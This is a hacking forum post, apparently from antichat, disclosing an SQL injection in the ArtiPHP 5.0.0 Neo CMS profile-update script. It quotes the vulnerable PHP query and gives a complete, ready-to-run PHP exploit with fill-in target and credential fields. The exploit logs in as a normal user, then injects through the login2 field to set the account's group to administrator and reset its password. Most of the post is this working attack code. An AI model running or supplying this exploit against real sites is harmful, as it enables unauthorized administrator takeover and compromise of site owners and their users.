|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: ArtiPHP
Version: 5.0.0 Neo
Author: http://www.artiphp.com/
Blind SQL-Injection.
Need: mq=off.
File: artpublic/utilisateurs/modif_inscription.php
PHP код:
$prenom = htmlspecialchars($prenom);
$nom = htmlspecialchars($nom);
$login = htmlspecialchars($login);
$login2 = htmlspecialchars($_POST['login2']);
$site = htmlspecialchars($site);
$url = htmlspecialchars($url);
$ville = htmlspecialchars($ville);
$metier = htmlspecialchars($metier);
$pass = htmlspecialchars($pass);
$pass2 = htmlspecialchars($pass2);
....
if ($pass && $pass2) {
// ***** MODIF jimro ***** Ajout $passMD5 et modif requкte - 28/10/2005
$passMD5 = md5($pass);
$requete = "UPDATE " . ARTI_PREFIX_TB . "utilisateurs SET prenomUtilisateur='$prenom', nomUtilisateur='$nom', passUtilisateur=password('$pass'), passUtilisateurMD5='$passMD5', loginUtilisateur='$login2', siteUtilisateur='$site', urlUtilisateur='$url', villeUtilisateur='$ville', metierUtilisateur='$metier' WHERE id_utilisateur='$SESSION_ID'";
...
Target:
Expl0it:
PHP код:
<?php
/**
* @author m0hze
* @copyright 2010
* @{http://forum.antichat.net}
* @ Yeeeees, baby!
*/
$host = 'target.com'; // URl target host example.com, don't use / (slash))!
$path = '/'; // Path to target folder
$login = 'YouLogin'; // Enter you login
$password = 'Password?'; // Enter you password
$newpass = 'NewPassword :)'; // This is you new password, for you account
$groupid = 1; // You new GROUPID, 1 = administrator.
function auth($login, $password) // Function auth on site, and get cookie
{
global $host, $path, $authscript;
$newpath = $path . 'artpublic/includes/verif_user.php';
$data = 'login=' . $login . '&pass=' . $password;
$fp = fsockopen($host, 80);
fputs($fp, "POST $newpath HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data);
while (!feof($fp)) {
$result .= fgets($fp, 128);
}
if (stripos($result, "index.php")) {
preg_match('#Set-Cookie:(.*);#iU', $result, $match);
//list($name,$value) = explode('=',$match[1]);
echo ("Authorisation: COMPLETE!...");
return (trim($match[1]) . ';');
} else {
die("Authorisation: FAILED!");
}
}
function exploit($cookie) // Function exploit, change you group, password.
{
global $host, $path, $authscript, $newpass, $groupid, $login;
$newpath = $path . 'artpublic/utilisateurs/modif_inscription.php';
$data = "prenom=HelloByExploit&nom=HelloByExploit&login2=$login',id_ugroup='".$groupid."',passUtilisateur=PASSWORD('" .
$newpass . "'),passUtilisateurMD5='" . md5($newpass) .
"'+where+loginUtilisateur='" . $login . "'+--+&login=$login&pass=1234&pass2=1234";
$fp = fsockopen($host, 80);
fputs($fp, "POST $newpath HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Referer: $referer\r\n");
fputs($fp, "Cookie: $cookie\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data);
echo '<br>Login: ' . $login;
echo '<br>Password: ' . $newpass;
}
exploit(auth($login, $password));
?>
|